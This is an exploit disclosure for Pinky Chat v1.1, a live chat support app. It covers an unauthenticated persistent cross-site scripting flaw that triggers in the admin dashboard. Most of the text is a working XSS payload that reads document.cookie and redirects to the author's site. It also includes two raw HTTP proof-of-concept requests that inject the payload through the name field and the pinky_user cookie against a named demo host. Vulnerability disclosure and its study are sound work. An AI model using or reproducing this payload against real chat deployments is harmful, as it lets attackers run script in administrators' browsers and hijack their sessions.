[+] :: Exploit Title: Pinky Chat v1.1 - Unauthenticated Persistent XSS [+] :: Google Dork: N/A [+] :: Date: 2020-10-13 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Rainbowbalaji [ https://codecanyon.net/user/rainbowbalaji ] [+] :: Software Version: 1.1 [+] :: Software Link: https://codecanyon.net/item/pinky-chat-live-chat-support-app/24265370 [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Unauthenticated Persistent XSS vulnerability was discovered in the Pinky Chat, tested version — v1.1. Injected payload will be triggered inside the admin dashboard for any privileged user (admin or operator). [$] :: Payload: 4325"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);top.location=`https://ex-mi.ru`;> [!] :: PoC #1 (Burp Suite): POST /livechat/chat-ajax/new HTTP/1.1 Host: prothemes.biz Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 228 Referer: https://prothemes.biz/livechat/chat Cookie: [cookies_here] json=1&name=4325%22--%3E%22%3E'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Ex.Mi%60)%3B(alert)(document.cookie)%3Btop.location%3D%60https%3A%2F%2Fex-mi.ru%60%3B%3E&email=poc%40vuln.tld&help=1&image=1 [!] :: PoC #2 (Burp Suite): POST /livechat/chat-ajax/add HTTP/1.1 Host: prothemes.biz Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 27 Referer: https://prothemes.biz/livechat/chat Cookie: pinky_user=4325%26quot%3B--%26gt%3B%26quot%3B%26gt%3B%5C%27%60+--+%60%26lt%3B%21--%26lt%3Bimg+src%3D%26quot%3B--%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3D%28alert%29%28%60Ex.Mi%60%29%3B%28alert%29%28document.cookie%29%3Btop.location%3D%60https%3A%2F%2Fex-mi.ru%60%3B%26gt%3B; pinky_email=poc%40vuln.tld; pinky_avatar=1; json=1&msg=Ex.Mi&chatID=440 [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi